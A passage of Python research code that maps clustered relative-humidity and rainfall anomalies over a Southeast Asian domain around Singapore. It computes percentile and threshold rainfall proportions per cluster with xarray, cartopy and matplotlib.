fig, gs_rhum = create_multisubplot_axes(optimal_k)
baseline = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
for cluster in range(optimal_k):
# cluster=4
print(f"{utils.time_now()} - clus {cluster}")
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
# print(baseline.values)
# print(rhum_gridded_centroids.values)
mean = baseline-rhum_gridded_centroids
# a = mean.values
# print(a)
# print(a.max())
# print(a.min())
# sys.exit()
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='k')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Anomalous RHUM, @ Pressure: {pressure}hpa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
Rhum = ax_rhum.contourf(lon, lat, mean,
# np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
levels, cmap='BrBG', extend='both')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity anomaly (%)', orientation='horizontal', pad=0.01,
ticks = levels);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
# break
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_v5_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
sys.exit()
print(f"\n\nTime taken to plot RHUM ANOMALIES for whole: {utils.time_since(rhumstarttime)}.")
def print_ind_clus_proportion_above_90thpercentile(model, dest, clus):
print(f'{utils.time_now()} - Generating >90th percentile RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
RFprec_to_ClusterLabels_dataset_vals = utils.open_pickle(f'{model.full_rf_5Xcoarsened_vals_path}')
percen90 = np.percentile(RFprec_to_ClusterLabels_dataset_vals, 90, axis=0)
compared_clus_to_90percent = (coarsened_clus_rf_ds > percen90).values
time_averaged_gridwise_RF_of_cluster_compared_to_90pcent = np.mean(compared_clus_to_90percent, axis=0)*100
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more RF \nthan the 90th percentile value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_90percent.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_90pcent.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF that exceeds 90th percentile of corresponding grid within full model (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_90thpercentile_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_under_10thpercentile(model, dest, clus):
print(f'{utils.time_now()} - Generating <10th percentile RF plot for clus: {clus+1}')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
# coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
# RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
# RFprec_to_ClusterLabels_dataset_vals = utils.open_pickle(f'{model.full_rf_5Xcoarsened_vals_path}')
# percen10 = np.percentile(RFprec_to_ClusterLabels_dataset_vals, 10, axis=0)
mean = get_RF_calculations(model, criteria='10perc', clus=clus)
baseline = get_RF_calculations(model, criteria='10perc', calculation='10perc', clus="whole")
print(mean)
print(baseline)
compared_clus_to_10percent = mean < baseline
time_averaged_gridwise_RF_of_cluster_compared_to_10pcent = np.mean(compared_clus_to_10percent, axis=0)*100
# compared_clus_to_10percent = (coarsened_clus_rf_ds < percen10).values
# time_averaged_gridwise_RF_of_cluster_compared_to_10pcent = np.mean(compared_clus_to_10percent, axis=0)*100
# rf_ds_lon = coarsened_clus_rf_ds.lon
# rf_ds_lat = coarsened_clus_rf_ds.lat
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig = plt.Figure(figsize=(10,10))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving less RF \nthan the 10th percentile value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_10percent.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_10pcent.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF that falls below the 10th percentile of corresponding grid within full model (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_under_10thpercentile_cluster_v2_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_above_fullmodel_mean(model, dest, clus):
print(f'{utils.time_now()} - Generating > mean RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
RFprec_to_ClusterLabels_dataset_vals = utils.open_pickle(f'{model.full_rf_5Xcoarsened_vals_path}')
gridmean = np.mean(RFprec_to_ClusterLabels_dataset_vals, axis=0)
compared_clus_to_gridmean = (coarsened_clus_rf_ds > gridmean).values
time_averaged_gridwise_RF_of_cluster_compared_to_gridmean = np.mean(compared_clus_to_gridmean, axis=0)*100
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more RF \nthan the mean RF value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_gridmean.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_gridmean.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF above full model\'s grid-mean (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_fullmodel_mean_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_above_250mm(model, dest, clus):
print(f'{utils.time_now()} - Generating > 250mm RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
compared_clus_to_250mm = (coarsened_clus_rf_ds > 250).values
time_averaged_gridwise_RF_of_cluster_compared_to_250mm = np.mean(compared_clus_to_250mm, axis=0)*100
time_averaged_gridwise_RF_of_cluster_compared_to_250mm = np.ma.masked_where(time_averaged_gridwise_RF_of_cluster_compared_to_250mm==0, time_averaged_gridwise_RF_of_cluster_compared_to_250mm)
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more than 250mm of RF in a day.",
fontweight='bold', fontsize=14, y=.97, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_250mm.shape[0]}\n"
"Note that all regions in grey have 0% of the grid members with >250mm of RF.", fontsize=13, y=1.04)
ax.set_facecolor('silver')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', np.vstack(plt.cm.CMRmap(np.linspace(1,0,12))))
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_250mm.T,
np.linspace(0,20,11),
alpha=1,
cmap=terrain_map,
extend='max')
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving >250mm (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,21,1))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_250mm_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def get_domain_geometry(model, dest):
lat_s_lim, lat_n_lim, lon_w_lim, lon_e_lim = model.domain_limits
plt.figure(figsize=(8,10))
ax = plt.subplot(111, projection=ccrs.PlateCarree())
ax.xaxis.set_major_formatter(model.lon_formatter)
ax.yaxis.set_major_formatter(model.lat_formatter)
ax.set_extent([lon_w_lim, lon_e_lim, lat_s_lim, lat_n_lim])
ax.set_title(f'Map extent: longitudes {model.LON_W} to {model.LON_E}E, latitudes {model.LAT_S} to {model.LAT_N}N')
geom = geometry.box(minx=model.LON_W, maxx=model.LON_E, miny=model.LAT_S, maxy=model.LAT_N)
ax.add_geometries([geom], ccrs.PlateCarree(), alpha=0.3)
ax.set_facecolor('silver')
ax.add_feature(cf.LAND, facecolor='white')
ax.coastlines('110m')
ax.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax.set_yticks(np.linspace(lat_s_lim, -lat_s_lim, 5), crs=ccrs.PlateCarree())
ax.set_xticks(np.linspace(lon_w_lim, lon_e_lim, 6), crs=ccrs.PlateCarree())
fn = f'{dest}/extent_{model.dir_str}.png'
plt.savefig(fn)
print(f'Extent saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM of proba of >1mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
# labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 1, axis=0) * 100
# a = plt.cm.YlOrRd(np.linspace(.9, .2, 5))
# b = plt.cm.YlGnBu(np.linspace(.2, .8, 10))
# all_colors = np.vstack((a,b))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\n', fontweight='bold')
levels = [int(i) for i in np.linspace(-100,100,21)]
# for clus in range(len(np.unique(labels_ar))):
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
# mean = np.mean([data.isel(time=t).precipitationCal.T.values > 1 for t in range(data.time.size)], axis=0)
# data_pred_proba_morethan1mm = np.ma.masked_where(mean<=0, mean)*100
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N)).precipitationCal.values
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
mean = np.mean(data > 1, axis=0)*100
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
# ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
# ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
# ax_rf_plot.set_yticklabels([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], rotation=55)
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='w', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavy_gt50mm_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM (v2) proba of >50mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon')
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat')
baseline = (get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole"))
if baseline.max() > 100:
baseline = baseline/100
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 50, axis=0) * 100
all_colors = np.vstack(plt.cm.BrBG(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels1 = np.linspace(-20,20,81)
levels2 = [int(i) for i in np.arange(-20, 21, 5)]
for clus in range(optimal_k):
print(f'\n{utils.time_now()}: {clus}.. ');
time.sleep(1); gc.collect()
data = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal
# mean = np.mean(data > 50, axis=0)*100
mean = data-baseline
# print(mean)
# print(mean.min())
# print(mean.max())
# sys.exit()
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
# ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
# ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
# ax_rf_plot.set_yticklabels([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], rotation=55)
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# np.linspace(0,100,11),
levels1,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:4],levels2[5:]]),
colors='grey', inline=True, fmt='%1.f', fontsize=7)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def acquire_rf_subset(model, criteria, clus, location_tag):
"""
This function discerns if the dataset to be retrieved is from the whole dataset,
or from a particular cluster. If it is the former, it will be pickled so retrieval will be faster
and no need to store in-memory.
"""
print(f"{utils.time_now()} - Acquiring dataset for {criteria}{location_tag}...")
if clus == "whole":
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
else:
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True)
if location_tag == '_sgonly':
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
elif location_tag == '_regionalonly':
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
if criteria == 'gt1mm':
data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values
elif criteria == 'gt50mm':
data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values
elif criteria in ['90perc', '10perc'] :
return RFprec_to_ClusterLabels_dataset.precipitationCal
# # for both baseline + cluster-level, this is sufficient for Dask to work on
# data = RFprec_to_ClusterLabels_dataset.precipitationCal.values
# data = np.percentile(RFprec_to_ClusterLabels_dataset.precipitationCal, 90, axis=0) # breaks for area >2000
elif criteria == 'rf_ds_lon':
data = RFprec_to_ClusterLabels_dataset.lon
elif criteria == 'rf_ds_lat':
data = RFprec_to_ClusterLabels_dataset.lat
# # i.e. its cluster-wise retrieval, no need to pickle as these will never be used again!
# # the z-scores are calculated based off whole-dataset std-dev and mean, not the cluster-wise dataset
# if clus == "whole":
# time.sleep(1); gc.collect()
# return utils.to_pickle(f"{criteria}_serialized_{clus}", data, model.cluster_dir)
# else:
# return data
return data
def get_RF_calculations(model, criteria, calculation=None, clus="whole", too_large=None,
sgonly=False, regionalonly=False):
"""
BREAK DOWN DATA FROM CALCULATION!
or really just go pickle
"""
print(f'{utils.time_now()} - Criteria: {criteria}, calculation: {calculation}, clus: {clus}, sgonly: {sgonly}, regionalonly: {regionalonly}')
# pickling the entire dataset which is what z-score will be calculated against
if sgonly: location_tag = '_sgonly'
elif regionalonly: location_tag = '_regionalonly'
else: location_tag = ''
found = utils.find(f"{criteria}_serialized_{clus}{location_tag}.pkl", model.cluster_dir)
if found: found = found[0]
else:
# note: why each model is pickled even as a whole or even in its cluster
# is that it relieves holding in-memory these arrays
# later, these pickles are simply opened lazily when needed
